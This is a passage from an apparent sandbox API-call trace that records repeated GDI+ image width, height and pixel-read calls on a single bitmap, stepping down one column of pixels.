(image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.257] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=142, color=0x1eed00) returned 0x0 [0119.257] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.257] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.257] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=143, color=0x1eed00) returned 0x0 [0119.257] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.257] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.257] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=144, color=0x1eed00) returned 0x0 [0119.257] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.258] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.258] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=145, color=0x1eed00) returned 0x0 [0119.258] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.258] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.258] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=146, color=0x1eed00) returned 0x0 [0119.258] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.258] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.258] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=147, color=0x1eed00) returned 0x0 [0119.258] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.258] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.258] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=148, color=0x1eed00) returned 0x0 [0119.259] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.259] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.259] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=149, color=0x1eed00) returned 0x0 [0119.259] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.259] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.259] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=150, color=0x1eed00) returned 0x0 [0119.259] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.259] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.259] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=151, color=0x1eed00) returned 0x0 [0119.259] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.259] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.259] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=152, color=0x1eed00) returned 0x0 [0119.260] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.260] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.260] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=153, color=0x1eed00) returned 0x0 [0119.260] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.260] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.260] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=154, color=0x1eed00) returned 0x0 [0119.260] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.260] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.260] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=155, color=0x1eed00) returned 0x0 [0119.260] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.260] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.261] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=156, color=0x1eed00) returned 0x0 [0119.261] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.261] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.261] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=157, color=0x1eed00) returned 0x0 [0119.261] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.261] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.261] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=158, color=0x1eed00) returned 0x0 [0119.261] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.261] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.261] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=159, color=0x1eed00) returned 0x0 [0119.261] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.262] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.262] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=160, color=0x1eed00) returned 0x0 [0119.262] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.262] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.262] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=161, color=0x1eed00) returned 0x0 [0119.262] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.262] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.262] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=162, color=0x1eed00) returned 0x0 [0119.262] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.262] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.262] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=163, color=0x1eed00) returned 0x0 [0119.263] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.263] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.263] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=164, color=0x1eed00) returned 0x0 [0119.263] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.263] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.263] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=165, color=0x1eed00) returned 0x0 [0119.263] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.263] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.263] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=166, color=0x1eed00) returned 0x0 [0119.263] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.263] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.263] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=167, color=0x1eed00) returned 0x0 [0119.264] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.264] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.264] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=168, color=0x1eed00) returned 0x0 [0119.264] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.264] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.264] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=169, color=0x1eed00) returned 0x0 [0119.264] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.264] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.264] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=170, color=0x1eed00) returned 0x0 [0119.264] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.264] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.264] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=171, color=0x1eed00) returned 0x0 [0119.265] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.265] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.265] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=172, color=0x1eed00) returned 0x0 [0119.265] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.265] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.265] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=173, color=0x1eed00) returned 0x0 [0119.270] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.270] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.270] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=174, color=0x1eed00) returned 0x0 [0119.270] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.271] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.271] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=175, color=0x1eed00) returned 0x0 [0119.271] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.271] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.271] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=176, color=0x1eed00) returned 0x0 [0119.271] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.271] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.271] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=177, color=0x1eed00) returned 0x0 [0119.271] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.271] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.271] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=178, color=0x1eed00) returned 0x0 [0119.271] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.272] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.272] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=179, color=0x1eed00) returned 0x0 [0119.272] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.272] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.272] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=180, color=0x1eed00) returned 0x0 [0119.272] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.272] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.272] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=181, color=0x1eed00) returned 0x0 [0119.272] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.272] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.272] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=182, color=0x1eed00) returned 0x0 [0119.272] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.273] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.273] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=183, color=0x1eed00) returned 0x0 [0119.273] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.273] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.273] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=184, color=0x1eed00) returned 0x0 [0119.273] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.273] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.273] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=185, color=0x1eed00) returned 0x0 [0119.273] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.273] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.273] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=186, color=0x1eed00) returned 0x0 [0119.274] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.274] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.274] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=187, color=0x1eed00) returned 0x0 [0119.274] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.274] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.274] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=188, color=0x1eed00) returned 0x0 [0119.274] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.274] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.274] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=189, color=0x1eed00) returned 0x0 [0119.274] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.274] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.274] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=190, color=0x1eed00) returned 0x0 [0119.275] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.275] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.275] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=191, color=0x1eed00) returned 0x0 [0119.275] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.275] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.275] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=192, color=0x1eed00) returned 0x0 [0119.275] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.275] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.275] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=193, color=0x1eed00) returned 0x0 [0119.275] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.275] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.275] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=194, color=0x1eed00) returned 0x0 [0119.276] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.276] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.276] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=195, color=0x1eed00) returned 0x0 [0119.276] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.276] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.276] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=196, color=0x1eed00) returned 0x0 [0119.276] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.276] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.276] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=197, color=0x1eed00) returned 0x0 [0119.276] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.276] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.276] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=198, color=0x1eed00) returned 0x0 [0119.277] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.277] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.277] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=199, color=0x1eed00) returned 0x0 [0119.277] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.277] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.277] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=200, color=0x1eed00) returned 0x0 [0119.277] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.277] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.277] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=201, color=0x1eed00) returned 0x0 [0119.277] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.277] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.278] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=202, color=0x1eed00) returned 0x0 [0119.278] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.278] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.278] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=203, color=0x1eed00) returned 0x0 [0119.278] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.278] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.278] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=204, color=0x1eed00) returned 0x0 [0119.278] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.278] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.278] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=205, color=0x1eed00) returned 0x0 [0119.278] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.278] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.278] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=206, color=0x1eed00) returned 0x0 [0119.279] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.279] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.279] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=207, color=0x1eed00) returned 0x0 [0119.279] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.279] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.279] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=208, color=0x1eed00) returned 0x0 [0119.279] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.279] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.279] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=209, color=0x1eed00) returned 0x0 [0119.279] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.279] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.279] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=210, color=0x1eed00) returned 0x0 [0119.280] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.280] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.280] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=211, color=0x1eed00) returned 0x0 [0119.280] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.280] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.280] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=212, color=0x1eed00) returned 0x0 [0119.280] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.280] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.280] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=213, color=0x1eed00) returned 0x0 [0119.280] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.280] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.280] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=214, color=0x1eed00) returned 0x0 [0119.281] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.281] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.281] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=215, color=0x1eed00) returned 0x0 [0119.281] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.281] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.281] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=216, color=0x1eed00) returned 0x0 [0119.281] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.281] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.281] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=217, color=0x1eed00) returned 0x0 [0119.281] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.281] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.281] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=218, color=0x1eed00) returned 0x0 [0119.282] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.282] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.282] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=219, color=0x1eed00) returned 0x0 [0119.282] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.282] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.282] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=220, color=0x1eed00) returned 0x0 [0119.282] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.282] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.282] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=221, color=0x1eed00) returned 0x0 [0119.282] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.282] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.282] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=222, color=0x1eed00) returned 0x0 [0119.283] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.283] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.283] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=223, color=0x1eed00) returned 0x0 [0119.283] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.283] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.283] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=224, color=0x1eed00) returned 0x0 [0119.283] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.283] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.283] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=225, color=0x1eed00) returned 0x0 [0119.283] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.283] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.283] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=226, color=0x1eed00) returned 0x0 [0119.284] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.284] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.284] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=227, color=0x1eed00) returned 0x0 [0119.284] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.284] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.284] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=228, color=0x1eed00) returned 0x0 [0119.284] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.284] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.284] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=229, color=0x1eed00) returned 0x0 [0119.284] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.284] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.284] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=230, color=0x1eed00) returned 0x0 [0119.285] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.285] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.285] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=231, color=0x1eed00) returned 0x0 [0119.285] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.285] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.285] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=232, color=0x1eed00) returned 0x0 [0119.285] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.285] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.285] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=233, color=0x1eed00) returned 0x0 [0119.285] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.285] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.285] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=234, color=0x1eed00) returned 0x0 [0119.286] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.286] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.286] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=235, color=0x1eed00) returned 0x0 [0119.286] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.286] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.286] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=236, color=0x1eed00) returned 0x0 [0119.286] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.286] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.286] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=237, color=0x1eed00) returned 0x0 [0119.286] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.286] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.286] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=238, color=0x1eed00) returned 0x0 [0119.286] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.287] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.287] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=239, color=0x1eed00) returned 0x0 [0119.287] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.287] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.287] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=240, color=0x1eed00) returned 0x0 [0119.287] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.287] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.287] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=241, color=0x1eed00) returned 0x0 [0119.287] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.287] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.287] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=242, color=0x1eed00) returned 0x0 [0119.287] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.288] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.288] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=243, color=0x1eed00) returned 0x0 [0119.288] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.288] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.288] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=244, color=0x1eed00) returned 0x0 [0119.288] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.288] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.288] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=245, color=0x1eed00) returned 0x0 [0119.288] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.288] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.288] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=246, color=0x1eed00) returned 0x0 [0119.288] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.289] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.289] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=247, color=0x1eed00) returned 0x0 [0119.289] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.289] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.289] GdipBitmapGetPixel 